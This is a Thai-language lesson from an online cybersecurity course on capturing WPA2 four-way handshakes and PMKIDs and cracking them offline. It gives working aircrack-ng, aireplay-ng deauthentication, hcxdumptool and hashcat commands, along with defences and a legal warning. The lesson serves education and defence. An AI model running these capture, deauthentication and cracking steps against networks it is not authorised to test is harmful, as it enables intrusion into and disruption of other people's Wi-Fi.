Cyber Security Academy · บทเรียน

การดักจับและถอดรหัส WPA2 Handshake

ดักจับแฮนด์เชก 4 ขั้นตอนด้วย aircrack-ng และทดลองโจมตีด้วยพจนานุกรมผ่าน Hashcat

บทเรียน 2 จาก 413 ขั้นตอน

การดักจับและถอดรหัส WPA2 Handshake เป็นบทเรียน Cyber Security Academy ฟรีบน CoddyKit นี่คือบทเรียนที่ 2 จากทั้งหมด 4 บทเรียน คุณสามารถอ่านบทเรียนทั้งหมดด้านล่างฟรี — จากนั้นลองปฏิบัติด้วยตัวคุณเองในเบราว์เซอร์พร้อมตัวแก้ไขโค้ดในตัวและติวเตอร์ AI ตลอด 24/7 บทเรียนนี้เป็นส่วนหนึ่งของเส้นทางการเรียน Cyber Security Academy และความก้าวหน้าของคุณจะซิงค์ข้ามเว็บและแอป CoddyKit คอร์ส Cyber Security Academy มีบทเรียนทั้งหมด 4 บทเรียน

กระบวนการจับมือ 4 ขั้นตอน

เมื่อไคลเอ็นต์เชื่อมต่อกับเครือข่าย WPA2 กระบวนการจับมือ 4 ขั้นตอนจะสร้างคีย์ชั่วคราวแบบคู่ (PTK) จาก PMK (ซึ่งสร้างมาจาก PSK) และค่าที่ใช้ครั้งเดียวแบบสุ่ม การดักจับกระบวนการจับมือนี้ทำให้สามารถถอดรหัสผ่านโดยไม่เชื่อมต่อเครือข่ายได้

การตั้งค่าโหมดตรวจสอบ

โหมดตรวจสอบช่วยให้การ์ดไร้สายดักจับเฟรมทั้งหมดได้โดยไม่คำนึงถึงปลายทาง ซึ่งจำเป็นสำหรับการดักจับกระบวนการจับมือแบบไม่โต้ตอบ และใช้งานได้เฉพาะกับการ์ดที่รองรับโหมดตรวจสอบเท่านั้น

# Check wireless interface
iwconfig

# Enable monitor mode
sudo airmon-ng start wlan0
# Creates: wlan0mon

# Kill interfering processes first:
sudo airmon-ng check kill

การดักจับกระบวนการจับมือแบบไม่โต้ตอบ

Airodump-ng ดักจับเฟรมโดยไม่ส่งข้อมูลออกไป ให้รอไคลเอ็นต์เชื่อมต่อตามปกติ หรือบังคับให้เชื่อมต่อใหม่ด้วยการยกเลิกการรับรองความถูกต้อง ผลการดักจับกระบวนการจับมือจะแสดงที่มุมขวาบนของผลลัพธ์จาก airodump

# Scan for networks
sudo airodump-ng wlan0mon

# Target a specific AP (replace values)
sudo airodump-ng -c 6 \
  --bssid AA:BB:CC:DD:EE:FF \
  -w handshake_capture \
  wlan0mon

# Top right shows: WPA handshake: AA:BB:...

การโจมตีด้วยการยกเลิกการรับรองความถูกต้อง

การส่งเฟรมยกเลิกการรับรองความถูกต้องปลอมจะบังคับให้ไคลเอ็นต์ที่เชื่อมต่ออยู่ยกเลิกการเชื่อมต่อและเชื่อมต่อใหม่ ทำให้เกิดการดักจับกระบวนการจับมือครั้งใหม่ การโจมตีนี้มีสัญญาณรบกวนสูง ตรวจจับได้ และไคลเอ็นต์ต้องอยู่ในระยะ

# Send deauth frames (authorized labs only)
sudo aireplay-ng -0 5 \
  -a AA:BB:CC:DD:EE:FF \
  -c CC:DD:EE:FF:00:11 \
  wlan0mon

# -0 5 = send 5 deauth frames
# -a = AP MAC
# -c = client MAC (or omit for broadcast)

การโจมตีด้วย PMKID: ไม่ต้องมีไคลเอ็นต์

การโจมตีด้วย PMKID (hcxdumptool) ดักจับ PMKID จากเฟรมประกาศหรือเฟรมตรวจหา โดยไม่จำเป็นต้องมีไคลเอ็นต์ที่เชื่อมต่ออยู่ ทำให้ได้ข้อมูลเร็วกว่า และสามารถถอดรหัสได้ง่ายพอ ๆ กับกระบวนการจับมือแบบเต็ม

# Capture PMKID
hcxdumptool -i wlan0mon --enable_status=1 \
  -o pmkid.pcapng

# Convert for Hashcat
hcxpcapngtool -o hash.hc22000 pmkid.pcapng

# Crack with Hashcat mode 22000
hashcat -m 22000 hash.hc22000 rockyou.txt

การถอดรหัสกระบวนการจับมือด้วย Hashcat

แปลงไฟล์การดักจับ แล้วโจมตีด้วย Hashcat โหมด 22000 (รูปแบบรวมของ WPA2) หรือโหมด 2500 (รูปแบบเดิม) ใช้ rockyou.txt ร่วมกับชุดกฎเพื่อให้ได้ผลลัพธ์ที่ดีที่สุด

# Convert pcap to Hashcat format
hcxpcapngtool -o hash.hc22000 handshake_capture-01.cap

# Crack with dictionary
hashcat -m 22000 hash.hc22000 rockyou.txt

# With rules
hashcat -m 22000 hash.hc22000 rockyou.txt -r best64.rule

# Brute force (short passwords)
hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d

การถอดรหัสด้วย Aircrack-ng

Aircrack-ng ถอดรหัส WPA2 โดยใช้ CPU โดยตรงจากไฟล์การดักจับ ทำงานช้ากว่าการถอดรหัสด้วย GPU ของ Hashcat แต่ไม่ต้องแปลงรูปแบบ

# Crack with aircrack-ng
aircrack-ng -w rockyou.txt handshake_capture-01.cap

# With multiple wordlists:
aircrack-ng -w wordlist1.txt,wordlist2.txt capture-01.cap

กลยุทธ์การใช้รายการคำศัพท์

ความสำเร็จในการถอดรหัสผ่าน WPA2 ขึ้นอยู่กับคุณภาพของรายการคำศัพท์ทั้งหมด ให้ใช้ rockyou.txt เป็นพื้นฐาน ชุดกฎของ Hashcat สำหรับการดัดแปลง รายการคำศัพท์เฉพาะบริษัท (ชื่อ+ปี+สัญลักษณ์) และรายการเป้าหมายจาก OSINT

ความเป็นจริงของเวลาในการถอดรหัส

รหัสผ่าน WPA2 แบบสุ่มที่มีความยาวตั้งแต่ 20 อักขระขึ้นไปไม่สามารถถอดรหัสได้ในทางปฏิบัติด้วยกำลังคำนวณ การถอดรหัสจะทำได้จริงเฉพาะกับรหัสผ่านสั้นหรือรหัสผ่านที่อิงจากรายการคำศัพท์เท่านั้น นี่คือเหตุผลที่ความยาวและความสุ่มของรหัสผ่านสำคัญกว่ากฎด้านความซับซ้อน

การป้องกัน

ใช้ WPA3-SAE ซึ่งป้องกันการโจมตีด้วยรายการคำศัพท์โดยไม่เชื่อมต่อเครือข่าย หรือใช้ WPA2 ที่มีวลีรหัสผ่านแบบสุ่มยาวตั้งแต่ 20 อักขระขึ้นไป และใช้ WPA2-Enterprise กับ EAP-TLS ซึ่งใช้ใบรับรองแทนรหัสผ่าน

ข้อเตือนใจด้านกฎหมาย

การดักจับกระบวนการจับมือ WPA2 บนเครือข่ายที่คุณไม่ได้เป็นเจ้าของถือว่าผิดกฎหมาย เทคนิคทั้งหมดในบทนี้ใช้ได้เฉพาะกับเครือข่ายทดสอบของคุณเองหรือสภาพแวดล้อมห้องปฏิบัติการที่ได้รับอนุญาตเท่านั้น เช่น ห้องทดลองที่บ้านหรือ AP ทดสอบที่จัดไว้โดยเฉพาะ

ตรวจสอบอย่างรวดเร็ว

การโจมตีด้วย PMKID ช่วยปรับปรุงอะไรเมื่อเทียบกับการดักจับกระบวนการจับมือแบบมาตรฐาน

สรุป: การถอดรหัส WPA2

การดักจับกระบวนการจับมือ WPA2 หรือ PMKID เปลี่ยนการถอดรหัส WiFi ให้เป็นการโจมตีด้วยรายการคำศัพท์โดยไม่เชื่อมต่อเครือข่าย ความสำเร็จขึ้นอยู่กับความแข็งแกร่งของรหัสผ่านทั้งหมด รหัสผ่านสั้นและอิงจากรายการคำศัพท์จะถูกถอดรหัสได้อย่างรวดเร็ว ส่วนรหัสผ่านแบบสุ่มที่ยาวจะถอดรหัสไม่ได้ในทางปฏิบัติ ให้ป้องกันด้วย WPA3-SAE วลีรหัสผ่านที่แข็งแกร่ง และ WPA2-Enterprise สำหรับเครือข่ายองค์กร

เริ่มต้นได้ฟรี

เรียนรู้ Cyber Security Academy ด้วย AI tutor — ฟรี

เขียนและเรียกใช้โค้ดจริงในเบราว์เซอร์ของคุณ รับความช่วยเหลือทันทีจาก AI tutor 24/7 และเรียนรู้ต่อจากที่คุณหยุดบนเว็บหรือในแอป

คอร์ส
76
บทเรียน
303

คำถามที่พบบ่อย

บทเรียน “การดักจับและถอดรหัส WPA2 Handshake” ฟรีหรือไม่

ใช่ — ข้อความเต็มของ “การดักจับและถอดรหัส WPA2 Handshake” ฟรีให้อ่านที่นี่บนเว็บ เพื่อปฏิบัติแบบโต้ตอบ (ตัวแก้ไขโค้ดในตัวและติวเตอร์ AI ตลอด 24/7) และปลดล็อคส่วนที่เหลือของคอร์ส Cyber Security Academy ให้อัปเกรดเป็น CoddyKit PRO คอร์ส Cyber Security Academy มีบทเรียนทั้งหมด 4 บทเรียน

คุณจะเรียนรู้อะไรในบทเรียน “การดักจับและถอดรหัส WPA2 Handshake”

ดักจับแฮนด์เชก 4 ขั้นตอนด้วย aircrack-ng และทดลองโจมตีด้วยพจนานุกรมผ่าน Hashcat คุณปฏิบัติ Cyber Security Academy ด้วยโค้ดที่ใช้งานได้จริงที่คุณเรียกใช้โดยตรงในเบราว์เซอร์ และติวเตอร์ AI ตลอด 24/7 ตอบคำถามของคุณขณะที่คุณไปผ่านบทเรียน

คุณต้องมีประสบการณ์ก่อนที่จะเริ่มเรียน Cyber Security Academy หรือไม่

ไม่จำเป็นต้องมีประสบการณ์มาก่อน Cyber Security Academy บน CoddyKit ออกแบบมาสำหรับผู้เริ่มต้นไปจนถึงผู้เรียนขั้นสูง คุณสามารถเริ่มต้นที่นี่หรือเริ่มจากตัวแรกและเรียนด้วยความเร็วของคุณเอง นี่คือบทเรียนที่ 2 จากทั้งหมด 4 บทเรียน

บทเรียน “การดักจับและถอดรหัส WPA2 Handshake” ใช้เวลานานแค่ไหน

บทเรียน CoddyKit ส่วนใหญ่ใช้เวลาประมาณ 5–10 นาที แต่ละบทเรียนจึงสั้นและเป็นแบบโต้ตอบ คุณสามารถก้าวหน้าอย่างต่อเนื่องและกลับมาเรียนต่อจากตรงที่เพิ่งหยุดบนเว็บและแอปได้เลย

ฉันเขียนและรันโค้ดในบทเรียน Cyber Security Academy นี้ได้ไหม

ได้ บทเรียน Cyber Security Academy ทุกบทมีตัวแก้ไขโค้ดในตัว คุณจึงเขียนและรันโค้ดจริงได้เลยในเบราว์เซอร์ และได้รับข้อเสนอแนะจาก AI ในทันที — ไม่ต้องติดตั้งในเครื่องของคุณ

บทเรียนทั้งหมดในหลักสูตรนี้

  1. โพรโทคอลความปลอดภัย 802.11: WEP, WPA2 และ WPA3
  2. การดักจับและถอดรหัส WPA2 Handshake
  3. การโจมตี Evil Twin และ Captive Portal
  4. Wi-Fi ระดับองค์กร: EAP และ RADIUS
← กลับไปที่ Cyber Security Academy